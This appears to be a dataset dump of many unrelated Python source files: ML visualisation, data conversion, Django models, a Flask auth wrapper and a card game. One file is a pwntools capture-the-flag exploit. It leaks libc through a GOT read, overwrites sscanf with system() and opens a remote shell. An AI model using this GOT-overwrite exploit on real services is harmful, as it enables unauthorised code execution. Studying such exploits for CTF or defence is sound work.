text stringlengths 38 1.54M |
|---|
import math
import matplotlib.pyplot as plt
import numpy as np
import tensorflow as tf
from PIL import Image
# from tf_cnnvis import *
def weight(shape):
    """Return a TF1 weight Variable initialised from a truncated normal (stddev 0.1)."""
    return tf.Variable(tf.truncated_normal(shape, stddev=0.1))
def bias(length):
    """Return a TF1 bias Variable of the given length, initialised to 0.1."""
    return tf.Variable(tf.constant(0.1, shape=[length]))
def layer(input, num_input_channels, filter_size, num_filters, use_bn=False,
          use_relu=True, use_pool=True, use_dropout=True):
    """Build one conv block: conv2d + bias, then optional BN / ReLU / pool / dropout.

    Relies on the module-level globals `training` (batch-norm mode flag) and
    `keep_prob` (dropout placeholder), which must exist when this is called.
    Returns the block's output tensor. Uses deprecated TF1.x APIs throughout.
    """
    # Filter shape is HWIO: [height, width, in_channels, out_channels].
    shape = [filter_size, filter_size, num_input_channels, num_filters]
    weights = weight(shape)
    biases = bias(num_filters)
    layer = tf.nn.conv2d(input=input, filter=weights, strides=[1, 1, 1, 1],
                         padding="SAME")
    layer += biases
    if use_bn:
        layer = tf.layers.batch_normalization(layer, training=training)
    if use_relu:
        layer = tf.nn.relu(layer)
    if use_pool:
        # 2x2 max-pool halves the spatial resolution.
        layer = tf.nn.max_pool(value=layer, ksize=[1, 2, 2, 1],
                               strides=[1, 2, 2, 1], padding="SAME")
    if use_dropout:
        layer = tf.nn.dropout(layer, keep_prob)
    return layer
def save_layer(layer, image, image_name, use):
    """Run one image through `layer` and save its feature maps as a PNG grid.

    Uses module-level globals: `session`, `x`, `keep_prob`, `img_size_flat`.
    Output is written to data/layers/features/<image_name>_<use>.png.
    """
    image = image.reshape(img_size_flat)
    # NOTE(review): keep_prob=0.5 keeps dropout active during visualisation —
    # confirm whether 1.0 was intended here.
    feed_dict = {x: [image], keep_prob: 0.5}
    values = session.run(layer, feed_dict=feed_dict)
    num_filters = values.shape[3]
    # Smallest square grid that fits all filter maps.
    num_grids = int(math.ceil(math.sqrt(num_filters)))
    fig, axes = plt.subplots(num_grids, num_grids)
    for i, ax in enumerate(axes.flat):
        if i < num_filters:
            img = values[0, :, :, i]
            ax.imshow(img, interpolation='nearest', cmap='binary')
    fig.savefig("data/layers/features/" + image_name +
                "_" + use + ".png")
# Dropout keep-probability, fed at run time.
keep_prob = tf.placeholder(tf.float32)
# Conv-layer hyperparameters (only layer 1 is actually built below).
filter_size1 = 3
num_filters1 = 32
filter_size2 = 3
num_filters2 = 64
filter_size3 = 3
num_filters3 = 128
filter_size4 = 3
num_filters4 = 256
num_channels = 3
img_size = 128
img_size_flat = img_size * img_size * num_channels
img_shape = (img_size, img_size)
training = True
# Flat image input, reshaped to NHWC for the conv layer.
x = tf.placeholder(tf.float32, shape=[None, img_size_flat], name='x')
x_image = tf.reshape(x, [-1, img_size, img_size, num_channels])
layer1 = layer(input=x_image, num_input_channels=num_channels,
               filter_size=filter_size1, num_filters=num_filters1)
session = tf.Session()
session.run(tf.global_variables_initializer())
# NOTE(review): weights are freshly initialised, not restored from a
# checkpoint — the saved feature maps show an untrained network; confirm.
img0 = Image.open("record/images/not_preprocessed/test/test_34.png")
image0 = np.array(img0)
img1 = Image.open("record/images/not_preprocessed/test/test_31.png")
image1 = np.array(img1)
save_layer(layer=layer1, image=image0, image_name="maze", use="conv")
save_layer(layer=layer1, image=image1, image_name="pig", use="conv")
# Earlier tf_cnnvis deconvolution experiments, kept for reference:
# image0 = image0.reshape(img_size_flat)
# feed_dict = {x: [image0], keep_prob: 0.5}
# layers = ["r", "p", "c"]
# is_success = deconv_visualization(sess_graph_path=session,
#                                   value_feed_dict=feed_dict,
#                                   input_tensor=x_image, layers=layers,
#                                   path_logdir="record/images/layers/maze/",
#                                   path_outdir="record/images/layers/maze/")
# image1 = image1.reshape(img_size_flat)
# feed_dict = {x: [image1], keep_prob: 0.5}
# layers = ["r", "p", "c"]
# is_success = deconv_visualization(sess_graph_path=session,
#                                   value_feed_dict=feed_dict,
#                                   input_tensor=x_image, layers=layers,
#                                   path_logdir="record/images/layers/pig/",
#                                   path_outdir="record/images/layers/pig/")
session.close()
img0.close()
img1.close()
|
# Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved
"""misc helper functions
"""
import hashlib
from collections import Counter, OrderedDict
import numpy as np
import torch
def make_weights_for_balanced_classes(dataset):
    """Return one sampling weight per example, inversely proportional to the
    frequency of that example's class (weights of one class sum to 1/n_classes)."""
    labels = [int(y) for _, y in dataset]
    counts = Counter(labels)
    n_classes = len(counts)
    # Per-class weight: rarer classes get proportionally larger weights.
    per_class = {label: 1 / (count * n_classes) for label, count in counts.items()}
    weights = torch.zeros(len(dataset))
    for idx, label in enumerate(labels):
        weights[idx] = per_class[label]
    return weights
class _SplitDataset(torch.utils.data.Dataset):
"""Used by split_dataset"""
def __init__(self, underlying_dataset, keys):
super(_SplitDataset, self).__init__()
self.underlying_dataset = underlying_dataset
self.keys = keys
def __getitem__(self, key):
return self.underlying_dataset[self.keys[key]]
def __len__(self):
return len(self.keys)
def split_dataset(dataset, n, seed=0):
    """
    Return a pair of datasets corresponding to a random split of the given
    dataset, with n datapoints in the first dataset and the rest in the last,
    using the given random seed
    """
    assert n <= len(dataset)
    indices = list(range(len(dataset)))
    # Seeded RandomState keeps the split reproducible for a given seed.
    np.random.RandomState(seed).shuffle(indices)
    return (_SplitDataset(dataset, indices[:n]),
            _SplitDataset(dataset, indices[n:]))
def seed_hash(*args):
    """Derive a 31-bit integer hash from all args, for use as a random seed."""
    digest = hashlib.md5(str(args).encode("utf-8")).hexdigest()
    return int(digest, 16) % (2 ** 31)
|
# Print the greeting 18 times, exactly as the original unrolled version did.
for _ in range(18):
    print("welcome to shenzhen!")
#!/usr/bin/env python2
# -*- coding: utf-8 -*-
from pwn import *
# Target binary and connection parameters (overridable via pwntools args).
exe = context.binary = ELF('sum')
host = args.HOST or '35.207.132.47'
port = int(args.PORT or 22226)
# Pin the matching libc when running the binary locally.
env = {'LD_PRELOAD':'./libc-2.27.so'}
def local(argv=[], *a, **kw):
    '''Execute the target binary locally'''
    # NOTE(review): mutable default argv is shared across calls; harmless as
    # written (never mutated), but worth confirming.
    if args.GDB:
        # Launch under gdb with the pinned libc and the script defined below.
        return gdb.debug([exe.path] + argv, env = env, gdbscript=gdbscript, *a, **kw)
    else:
        return process([exe.path] + argv, env = env, *a, **kw)
def remote(argv=[], *a, **kw):
    '''Connect to the process on the remote host'''
    # NOTE: this shadows pwnlib's remote(); connect() is used internally.
    io = connect(host, port)
    if args.GDB:
        gdb.attach(io, gdbscript=gdbscript)
    return io
def start(argv=[], *a, **kw):
    '''Start the exploit against the target.'''
    # LOCAL flag selects a local process; otherwise connect to host:port.
    if args.LOCAL:
        return local(argv, *a, **kw)
    else:
        return remote(argv, *a, **kw)
context.terminal = ['gnome-terminal', '-e']
# gdb commands applied when GDB mode is requested.
gdbscript = '''
set environment LD_PRELOAD ./libc-2.27.so
break *0x400B41
continue
'''.format(**locals())
# -- Exploit goes here --
io = start()
io.sendlineafter('>', '-1')
log.info("puts@got: {}".format(hex(exe.got['puts'])))
# NOTE: Python-2 integer division — the GOT address divided by 8 yields the
# out-of-bounds 64-bit-slot index used by the binary's get/set commands.
io.sendlineafter('>', 'get {}'.format(exe.got['puts'] / 8))
io.recvuntil('bye')
io.recvuntil('bye')
io.recvuntil('> ')
libc = ELF(env['LD_PRELOAD'])
# Leaked puts address -> libc base.
addr = int(io.recvline().strip())
libc.address = addr - libc.symbols['puts']
log.success('libc addr: {}'.format(hex(libc.address)))
# Overwrite sscanf's GOT slot with system(), then trigger it with a command.
io.sendlineafter('>', 'set {} {}'.format(exe.got['__isoc99_sscanf'] / 8, libc.symbols['system']))
io.sendlineafter('>', 'bye || /bin/sh')
io.interactive()
|
# !usr/bin/env python
# -*- coding: utf-8 -*-
import pandas as pd
from datetime import datetime
import os
def old2new(df):
    """Normalise a legacy 3-column frame: convert column 1 to a date string
    via num2date, sort by (date, place), and attach the column names."""
    df[1] = df[1].apply(num2date)
    df = df.sort_values([1, 0])
    df.columns = ['place', 'date', 'people']
    return df
def num2date(num, year='2017'):
    """Convert an MMDDHH-style value (int or str) into 'YYYY-MM-DD:HH'."""
    digits = str(num)
    return f"{year}-{digits[:2]}-{digits[2:4]}:{digits[4:]}"
def csv2json(file, year=2017, save_path='data/trains.json'):
    """Read the raw CSV, normalise and sort it, and dump it as JSON records.

    Raises OSError when save_path already exists (never overwrites).
    NOTE(review): the ``year`` parameter is currently unused — num2date falls
    back to its own default year; confirm whether it should be forwarded.
    """
    df = pd.read_csv(file, sep=',', header=None)
    df[1] = df[1].apply(num2date)
    df = df.sort_values([1, 0])
    df.columns = ['place', 'date', 'people']
    df_res = df.reindex(columns=['date', 'place', 'people', 'week', 'holiday'])
    # ISO weekday 1..7; Saturday/Sunday flagged as holidays.
    df_res['week'] = df_res['date'].apply(lambda x: datetime.strptime(x, '%Y-%m-%d:%H').weekday()+1)
    df_res['holiday'] = df_res['week'].apply(lambda x: 1 if x in [6, 7] else 0)
    res = df_res.to_json(orient='records')
    if os.path.exists(save_path):
        raise OSError('文件已存在,无法保存!')
    with open(save_path, mode='w+', encoding='utf-8') as f:
        # 'with' closes the file; the previous explicit f.close() was redundant.
        f.write(res)
if __name__ == '__main__':
    # Convert the default training CSV when run as a script.
    file = 'data/train3.csv'
    csv2json(file)
|
import gdsfactory as gf
def test_transition_ports() -> None:
    """Extruding a linear width transition keeps each end's original width."""
    width1 = 0.5
    width2 = 1.0
    x1 = gf.cross_section.strip(width=width1)
    x2 = gf.cross_section.strip(width=width2)
    xt = gf.path.transition(cross_section1=x1, cross_section2=x2, width_type="linear")
    path = gf.path.straight(length=5)
    c = gf.path.extrude(path, xt)
    # Port o1 carries cross_section1 (narrow end), o2 carries cross_section2.
    assert c.ports["o1"].cross_section.cross_section1.width == width1
    assert c.ports["o2"].cross_section.cross_section2.width == width2
if __name__ == "__main__":
    # test_transition_ports()
    # Same scenario as the test above, plus an interactive viewer.
    width1 = 0.5
    width2 = 1.0
    # Consistency fix: use the named widths instead of repeating the literals,
    # so the asserts below can never silently diverge from the construction.
    x1 = gf.cross_section.strip(width=width1)
    x2 = gf.cross_section.strip(width=width2)
    xt = gf.path.transition(cross_section1=x1, cross_section2=x2, width_type="linear")
    path = gf.path.straight(length=5)
    c = gf.path.extrude(path, xt)
    assert c.ports["o1"].cross_section.cross_section1.width == width1
    assert c.ports["o2"].cross_section.cross_section2.width == width2
    c.show(show_ports=True)
|
from math import sin, cos, tan, radians
# Read an angle in degrees and print its tangent.
angi = int(input('Informe o ângulo: '))
ang = radians(angi)
s = sin(ang)
c = cos(ang)
t = tan(ang)
# NOTE(review): only the tangent is printed; s and c are computed but unused —
# confirm whether all three were meant to be shown.
print(t)
|
'''
Copyright (C) 2018-2023 Bryant Moscon - bmoscon@gmail.com
Please see the LICENSE file for the terms and conditions
associated with this software.
'''
from cryptofeed import FeedHandler
from cryptofeed.backends.influxdb import BookInflux, CandlesInflux, FundingInflux, TickerInflux, TradeInflux
from cryptofeed.defines import CANDLES, FUNDING, L2_BOOK, TICKER, TRADES
from cryptofeed.exchanges import Bitmex, Coinbase
from cryptofeed.exchanges.binance import Binance
# InfluxDB 2.x connection settings — replace TOKEN with a real API token.
INFLUX_ADDR = 'http://localhost:8086'
ORG = 'cryptofeed'
BUCKET = 'cryptofeed'
TOKEN = 'XXXXXXXXXX'
def main():
    """Wire up exchange feeds and stream every callback into InfluxDB."""
    f = FeedHandler()
    # BitMEX perpetual: funding rates + level-2 order book.
    f.add_feed(Bitmex(channels=[FUNDING, L2_BOOK], symbols=['BTC-USD-PERP'], callbacks={FUNDING: FundingInflux(INFLUX_ADDR, ORG, BUCKET, TOKEN), L2_BOOK: BookInflux(INFLUX_ADDR, ORG, BUCKET, TOKEN)}))
    # Coinbase spot: trades, book and ticker as three separate feeds.
    f.add_feed(Coinbase(channels=[TRADES], symbols=['BTC-USD'], callbacks={TRADES: TradeInflux(INFLUX_ADDR, ORG, BUCKET, TOKEN)}))
    f.add_feed(Coinbase(channels=[L2_BOOK], symbols=['BTC-USD'], callbacks={L2_BOOK: BookInflux(INFLUX_ADDR, ORG, BUCKET, TOKEN)}))
    f.add_feed(Coinbase(channels=[TICKER], symbols=['BTC-USD'], callbacks={TICKER: TickerInflux(INFLUX_ADDR, ORG, BUCKET, TOKEN)}))
    # Binance candles, including in-progress (unclosed) candles.
    f.add_feed(Binance(candle_closed_only=False, channels=[CANDLES], symbols=['BTC-USDT'], callbacks={CANDLES: CandlesInflux(INFLUX_ADDR, ORG, BUCKET, TOKEN)}))
    f.run()

if __name__ == '__main__':
    main()
|
from pydub import AudioSegment
import random
origAudio = AudioSegment.from_wav("Full2.wav")
# Cut 180 clips of ~1-2 s; each starts at second i and ends at a random point
# up to one second past the next clip's start, so consecutive clips overlap.
for i in range(180):
    t1 = i * 1000  # pydub slices in milliseconds
    t2 = (i+1+random.random()) * 1000
    newAudio = origAudio[t1:t2]
    newAudio.export('gen_samples/'+str(i)+'.wav', format="wav")
# ---LICENSE-BEGIN - DO NOT CHANGE OR MOVE THIS HEADER
# This file is part of the Neurorobotics Platform software
# Copyright (C) 2014,2015,2016,2017 Human Brain Project
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
# ---LICENSE-END
import argparse as ap
import cv2
import numpy as np
import pickle
import time
from typing import Dict
def parse_args():
    """
    Defines the valid commandline options and the variables they are linked to.
    Returns:
        An object which contains the variables which correspond to the
        commandline options.
    """
    # Default spacing (pixels) between the basic recognizers.
    dflt_move=4
    parser = ap.ArgumentParser(description='SNN feature detector')
    parser.add_argument('--c1-output', type=str, default='C1_reconstructions/',
                        help='The toplevel output directory for C1\
                        reconstructions')
    parser.add_argument('--delta', metavar='vert', default=dflt_move, type=int,
                        help='The horizontal and vertical distance between the\
                        basic recognizers')
    parser.add_argument('--feature-dir', type=str,
                        help='A directory where the features are stored as images')
    parser.add_argument('--filter', choices=['canny', 'sobel', 'none'],
                        default='none', help='Sets the edge filter to be used.\
                        Defaults to \'none\'')
    parser.add_argument('--frames', default=10, type=int,
                        help='The number of video frames to be processed')
    parser.add_argument('--no-c1', action='store_true',
                        help='Disables the creation of C1 layers')
    parser.add_argument('--plot-spikes', action='store_true',
                        help='Plot the spike trains of all layers')
    parser.add_argument('--plot-weights', action='store_true',
                        help='Plots the learned feature weights and exits')
    parser.add_argument('--refrac-s1', type=float, default=.1, metavar='MS',
                        help='The refractory period of neurons in the S1 layer in ms')
    parser.add_argument('--refrac-s2', type=float, default=.1, metavar='MS',
                        help='The refractory period of neurons in the S2 layer in ms')
    parser.add_argument('--refrac-c1', type=float, default=.1, metavar='MS',
                        help='The refractory period of neurons in the C1 layer in ms')
    parser.add_argument('--reconstruct-s1-img', action='store_true',
                        help='If set, draws a reconstruction of the recognized\
                        features from S1')
    parser.add_argument('--reconstruct-c1-img', action='store_true',
                        help='If set, draws a reconstruction of the recognized\
                        features from C1')
    parser.add_argument('--scales', default=[1.0, 0.71, 0.5, 0.35, 0.25],
                        nargs='+', type=float,
                        help='A list of image scales for which to create\
                        layers. Defaults to [1, 0.71, 0.5, 0.35, 0.25]')
    parser.add_argument('--sim-time', default=100, type=float, help='Simulation time')
    parser.add_argument('--target-name', type=str,
                        help='The name of the already edge-filtered image to\
                        be recognized')
    args = parser.parse_args()
    # Echo the parsed configuration for the run log.
    print(args)
    return args
def filter_img(target_img, filter_type):
    """
    Performs the given edge detector on the given image
    Arguments:
        `target_img`: The image to detect edges from
        `filter_type`: The filter to be applied to the target image. Can be one
                       of 'canny', 'sobel' or 'none', if the image is to be
                       used as-is.
    Returns:
        An image containing the edges of the target image
    """
    if filter_type == 'none':
        # No filtering requested: return the image untouched (and skip the
        # Gaussian blur the original computed needlessly in this case).
        return target_img
    blurred_img = cv2.GaussianBlur(target_img, (5, 5), 1.4)
    if filter_type == 'canny':
        return cv2.Canny(blurred_img, 70, 210)
    # Sobel gradient magnitude, converted back to 8-bit.
    dx = cv2.Sobel(blurred_img, cv2.CV_64F, 1, 0)
    dy = cv2.Sobel(blurred_img, cv2.CV_64F, 0, 1)
    edge_detected = cv2.sqrt(dx * dx + dy * dy)
    return cv2.convertScaleAbs(edge_detected)
def get_gabor_feature_names():
    """Return the canonical names of the four gabor orientation features."""
    names = ('slash', 'horiz_slash', 'horiz_backslash', 'backslash')
    return list(names)
def get_gabor_edges(target_img) -> Dict[str, np.array]:
    """
    Computes the gabor filtered images for four orientations for the given
    unfiltered image
    Parameters:
        `target_img`: The original target image
    Returns:
        A dictionary which contains for each name the corresponding filtered
        image
    """
    # Four orientations offset by pi/8, matching the feature names in order.
    angles = [np.pi / 8, np.pi / 4 + np.pi / 8, np.pi / 2 + np.pi / 8,
              3 * np.pi / 4 + np.pi / 8]
    feature_names = get_gabor_feature_names()
    blurred_img = cv2.GaussianBlur(target_img, (5, 5), 5)  # Gaussian blur to smooth the image
    # filter2D at 64-bit float depth, then scaled back to 8-bit per feature.
    return dict([(name,
                  cv2.convertScaleAbs(\
                      cv2.filter2D(blurred_img, cv2.CV_64F,
                                   cv2.getGaborKernel((5, 5), 1.4, angle, 5, 1))))\
                 for name, angle in zip(feature_names, angles)])
def read_and_prepare_img(target_name, filter_type):
    """
    Reads the input image and performs the edge detector of the passed
    commandline arguments on it
    Arguments:
        `target_name`: The name of the image to be read
        `filter_type`: The filter to be applied to the target image. Can be one
                       of 'canny', 'sobel' or 'none', if the image is to be
                       used as-is.
    Returns:
        An image containing the edges of the target image
    """
    # CV_8U loads the image as single-channel 8-bit (grayscale).
    target_img = cv2.imread(target_name, cv2.CV_8U)
    # Optionally resize the image to 300 pixels (or less) in height
    return filter_img(target_img, filter_type)
def float_to_fourcc_string(x):
    """
    Converts a float to its fourcc code as a four-character string.
    (Fixes the "Converns" typo in the original docstring.)
    Parameters:
        `x`: The float as returned by cv2.VideoCapture.get(cv2.CAP_PROP_FOURCC)
    Returns:
        The used encoder extension as a string
    """
    x = int(x)
    # FourCC packs four ASCII characters little-endian into 32 bits.
    return ''.join(chr((x >> shift) & 0xFF) for shift in (0, 8, 16, 24))
def fourcc_string_to_int(s):
    """
    Converts a fourcc string to its packed integer code.
    (Fixes the original docstring, which claimed a float return.)
    Parameters:
        `s`: The four-character fourcc string to be converted
    Returns:
        An int representing the code for the given codec string
    """
    # Inverse of float_to_fourcc_string: little-endian character packing.
    n1 = ord(s[0])
    n2 = ord(s[1])
    n3 = ord(s[2])
    n4 = ord(s[3])
    return (n4 << 24) + (n3 << 16) + (n2 << 8) + n1
|
from jinja2 import Environment, FileSystemLoader
# from weasyprint import HTML
# import pdfkit
# Static demo table injected into the template as raw HTML.
table_placeholder = """<div class="row" >
<table class="u-full-width">
<thead class="fqred">
<tr>
<th>Name</th>
<th>Age</th>
<th>Sex</th>
<th>Location</th>
</tr>
</thead>
<tbody>
<tr>
<td>Dave Gamache</td>
<td>26</td>
<td>Male</td>
<td>San Francisco</td>
</tr>
<tr>
<td>Dwayne Johnson</td>
<td>42</td>
<td>Male</td>
<td>Hayward</td>
</tr>
</tbody>
</table>
</div>
"""
# Template context: every placeholder value rendered into template.html.
temp_vars = {
    'client':'Example Client',
    'totalTraffic': 123000000,
    'percentages': {
        'total': 25.25,
        'true': 9.13,
        'view': 54.65
    },
    'source': {'bottom': 0.00,
        'bottomRange': 'Premium',
        'top': 99.98,
        'topRange': 'Critical'
    },
    'trafficType': 'Impressions',
    'implementationTech': 'JS Tag',
    'table_placeHolder': table_placeholder,
    'input' : {
        'source': 'Network',
        'subsource': 'Publisher',
        'campaign' : 'Campaign ID',
        'domain': 'Page URL'
    },
    'startDate': '1/24/2017',
    'endDate': '3/24/2017',
    'diveInput': 'Sub Source',
    'diveFocus': 'Example Publisher',
}
# temp_vars =
# Render template.html from the current directory and write the result.
env = Environment(loader=FileSystemLoader('.'))
template = env.get_template("template.html")
html_out = template.render(temp_vars)
# pdf = HTML(html_out).write_pdf()
# with open('report.pdf', 'w') as f:
#     f.write(pdf)
with open('index.html', 'w') as f:
    f.write(html_out)
# pdfkit.from_file('index.html', 'out.pdf')
|
from __future__ import absolute_import
from django.db import models
from .utils import ugettext_lazy_compact as _
# from localflavor.in_ import models as india_models
class ClientIndustry(models.Model):
    """Lookup table of industries a Client can belong to."""

    # Unique, required display name.
    name = models.CharField(
        max_length=50,
        blank=False,
        null=False,
        unique=True,
    )
    # URL-safe identifier, unique and indexed for lookups.
    slug = models.SlugField(
        max_length=50,
        blank=False,
        null=False,
        unique=True,
        db_index=True,
    )

    def __unicode__(self):
        # Python-2 style representation; NOTE(review): Django 2+ uses __str__.
        return self.name
class Client(models.Model):
    """A client organisation with optional industry and mailing address."""

    name =models.CharField(
        verbose_name='Client name',
        max_length=200,
        blank=False,
        unique=True,
        null=False
        )
    # Optional link to an industry; kept (set to NULL) if the industry is deleted.
    industry = models.ForeignKey(
        'ClientIndustry',
        blank=True,
        null=True,
        on_delete=models.SET_NULL,)
    mailing_street = models.CharField(
        max_length=100,
        blank=True,
        null=True,
        verbose_name=_('Mailing Street'))
    mailing_street2 = models.CharField(
        max_length=100,
        blank=True,
        null=True,
        verbose_name=_('Mailing Street 2'))
    mailing_city = models.CharField(
        max_length=100,
        blank=True,
        null=True,
        verbose_name=_('Mailing City'))
    # mailing_state = india_models.INStateField(
    #     blank=True,
    #     null=True,
    #     verbose_name=_('Mailing State'))
    mailing_zip = models.CharField(
        max_length=10,
        blank=True,
        null=True,)
    website = models.URLField(
        max_length=200,
        blank=True,
        null=True,)

    class Meta:
        verbose_name = _('client')
        verbose_name_plural = _('clients')

    def __unicode__(self):
        # Python-2 style representation; NOTE(review): Django 2+ uses __str__.
        return self.name
|
#coding=utf-8
'''
FileName :decomPCA.py
Author :@zch0423
Date :Jun 11, 2021
Description :
PCA 查看bert embedding主成分
'''
#%%
import numpy as np
from sklearn.decomposition import PCA
import matplotlib.pyplot as plt
#%%
def loadData(data_type="trn", w2v_type="avg",
             base="/Users/zch/Desktop/IM319_NLP.nosync/project/data"):
    '''
    @Description
        Load a BERT-embedding matrix and its labels from .npy files.
    ------------
    @Params
    data_type, str, in ["trn", "dev", "tst"]
    w2v_type, str, in ["avg", "CLS"]
    base, str, root data directory (default keeps the original hard-coded
        path, so existing callers are unaffected)
    ------------
    @Returns
    X, y
    '''
    if data_type not in ["trn", "dev", "tst"]:
        raise ValueError("check data_type!")
    if w2v_type not in ["avg", "CLS"]:
        raise ValueError("check w2v_type")
    X_path = f"{base}/w2v/{w2v_type}_{data_type}_last.npy"
    y_path = f"{base}/labels/{data_type}.npy"
    X = np.load(X_path)
    # Drop any middle singleton dimension: (N, ..., D) -> (N, D).
    X = X.reshape(X.shape[0], X.shape[-1])
    y = np.load(y_path)
    return X, y
#%%
w2v_type="avg"
# trn_X, trn_y = loadData("trn", w2v_type)
dev_X, dev_y = loadData("dev", w2v_type)
# tst_X, tst_y = loadData("tst", w2v_type)
# Sweep component counts 1, 21, 41, ..., 381 and record the cumulative
# explained-variance ratio for each fit.
x = np.arange(1, 400, 20)
y = []
for i in x:
    pca = PCA(n_components=i)
    pca.fit(dev_X)
    y.append(sum(pca.explained_variance_ratio_))
plt.plot(x, y)
plt.scatter(x,y)
# Annotate every 4th point just below its marker.
for i,j in list(zip(x, y))[::4]:
    plt.text(i, j-0.05, "(%d,%.2f)" % (i,j))
plt.title("PCA For BERT Embedding")
plt.ylabel("Explained Ratio")
plt.xlabel("Components")
plt.show()
|
# Header values for an ASCII PPM (P3) image.
magic = "P3"
author = "# Created by Shawn Wilkinson"
size_x, size_y = (320, 240)
inten = 255
# Solid mid-gray test image.
color = (127, 127, 127)
# Write the header, then one row of pixels per line. Using 'with' guarantees
# the file is flushed and closed (the original never closed it).
with open('1.4pe1.ppm', 'w+') as f:
    f.write(magic + "\n")
    f.write(author + "\n")
    f.write(str(size_x) + " " + str(size_y) + "\n")
    f.write(str(inten) + "\n")
    for y in range(size_y):
        for x in range(size_x):
            f.write(str(color[0]) + " " + str(color[1]) + " " + str(color[2]) + " ")
        f.write("\n")
#!/usr/bin/env python3
import riotgear.cli
import riotgear.plugin
if __name__ == "__main__":
    # Build the CLI, load every plugin from ./plugins, then parse and launch.
    parser = riotgear.cli.clidriver()
    reg = riotgear.plugin.Registry(default_dirs=['plugins'])
    reg.load_all()
    # Two-stage parse — presumably the first pass consumes known args and the
    # second collects the remainder; confirm against riotgear.cli.
    args = parser.parse_partial()
    extra = parser.parse()
    print(extra)
    parser.launch()
|
# Flask Framework
from flask import Flask, jsonify, request, make_response, Response
# Routes
from src.routes.api import api
# Authentication
from src.models.auth import Auth
# Dummy Credentials
# Single hard-coded test account (email + basic password + bearer token).
# NOTE(review): replace with a real user store before production use.
users = {
    'email': 'ruel@mindo.com',
    'auth': {
        'key': 'secretkey',
        'password': 'test',
        'token': 'F6Xik2zCXdAEBdIKkOmeZuR6BasPQ4QeuxTZEo5kn44wjT9wVl3YZU6uHhMwGW276GfMEt38AQlRxxEAwSkuD8eydleHAnOiAxNTYxNjI2MjM2LjAsICdpZCc6IDF9YTBjZmM2OWFmZDk2NWMyYzNmNDg3ZTk5OGUyOTFiMzc5MWI3Yzk5YzFkMTE0MzRmNjg3MDk1NjU3NWI3MmM3Ng'
    }
}
# HTTP
class HTTP:
    """Small Flask wrapper: JSON responses plus Basic/Bearer authentication
    against the module-level dummy `users` record."""

    # HTTP status code -> reason phrase used in response bodies.
    status = {
        '200': 'Ok',
        '201': 'Created',
        '400': 'Bad Request',
        '401': 'Unauthorized',
        '403': 'Forbidden',
        '404': 'Not Found',
        '405': 'Method Not Allowed',
        '406': 'Not Acceptable',
        '409': 'Conflict',
    }
    # Request
    request = request

    def __init__(self):
        # Authentication
        self.auth = Auth()
        # Flask Framework
        self.flask = Flask(__name__)

    # API Services
    def api(self, service):
        # Delegates to the imported routes module, passing this HTTP instance.
        api(self, service)

    # Response
    def response(self, data=None, code=401):
        """Build a JSON response.

        `data` is either a payload, or an error dict containing 'error',
        'code' and optionally 'headers'.
        """
        # Fix: the old signature used a mutable default (data=[]) shared
        # between calls; default to None and substitute a fresh list.
        if data is None:
            data = []
        para = {
            'status': code,
            'message': self.status[str(code)],
        }
        if 'error' in data:
            # Error path: propagate the error's own status code and headers.
            para['status'] = data['code']
            para['result'] = {'error': data['error']}
            response = make_response(jsonify(para), data['code'])
            if 'headers' in data:
                for i, v in data['headers'].items():
                    response.headers.set(i, v)
            return response
        else:
            if len(data) > 0:
                para['result'] = data
            return make_response(jsonify(para), code)

    # Authenticate
    def authenticate(self):
        """Validate the Authorization header (Basic or Bearer).

        Returns True / the token-verification result on success, or an error
        dict suitable for response() on failure.
        """
        auth = request.headers.get('authorization')
        if auth is None:
            # Fix: a missing header previously crashed with AttributeError on
            # None.find; report the same 401 as a failed Basic attempt.
            return {
                'code': 401,
                'error': 'Username/Password is Required',
                'headers': {
                    'WWW-Authenticate': 'Basic realm="Required"'
                }
            }
        if auth.find('Basic') >= 0:
            basic = self.auth.decode(auth.replace('Basic ', '')).split(':')
            if basic[0] == users['email'] and basic[1] == users['auth']['password']:
                return True
            else:
                r = {
                    'code': 401,
                    'error': 'Username/Password is Required',
                    'headers': {
                        'WWW-Authenticate': 'Basic realm="Required"'
                    }
                }
                return r
        else:
            if auth.find('Bearer') >= 0:
                parse = self.auth.parse(auth.replace('Bearer ', ''))
                if parse and 'payload' in parse:
                    # Payload
                    payload = parse['payload']
                    if 'token' in parse:
                        if users['auth']['token'] == parse['token']:
                            # Verify the token signature with the shared key.
                            return self.auth.verify(users['auth']['key'], payload, parse['signature'])
            return {'code': 401, 'error': 'Invalid Token'}
#!/usr/bin/env python
""" http://wiki.dominionstrategy.com/index.php/Hill_Fort"""
import unittest
from dominion import Game, Card, Piles
###############################################################################
class Card_Hill_Fort(Card.Card):
    """Hill Fort (Allies, $5 Action-Fort): gain a card costing up to $4,
    either into hand, or to the default destination with +1 Card / +1 Action."""

    def __init__(self):
        Card.Card.__init__(self)
        self.cardtype = [
            Card.CardType.ACTION,
            Card.CardType.FORT,
        ]  # pylint: disable=no-member
        self.base = Card.CardExpansion.ALLIES
        self.cost = 5
        self.name = "Hill Fort"
        self.desc = """Gain a card costing up to $4.
Choose one: Put it into your hand; or +1 Card and +1 Action."""

    def special(self, game, player):
        # Ask the player which mode to use; the option value doubles as a tag.
        chc = player.plr_choose_options(
            "Choose One - gain a card costing up to $4 and ...",
            ("put it into your hand", Piles.HAND),
            ("+1 Card and +1 Action", "disc"),
        )
        if chc == Piles.HAND:
            player.plr_gain_card(cost=4, destination=Piles.HAND)
        elif chc == "disc":
            # Gain normally, then draw a card and add an action.
            player.plr_gain_card(cost=4)
            player.pickup_card()
            player.add_actions(1)
###############################################################################
class Test_Hill_Fort(unittest.TestCase):
    """Exercises both Hill Fort modes via scripted player input."""

    def setUp(self):
        self.g = Game.TestGame(numplayers=1, initcards=["Forts"])
        self.g.start_game()
        self.plr = self.g.player_list()[0]
        # Draw from the rotating Forts pile until Hill Fort comes up.
        while True:
            self.card = self.g["Forts"].remove()
            if self.card.name == "Hill Fort":
                break
        self.plr.add_card(self.card, Piles.HAND)

    def test_play_hand(self):
        # Gain-to-hand mode: Silver lands in hand, net hand size unchanged
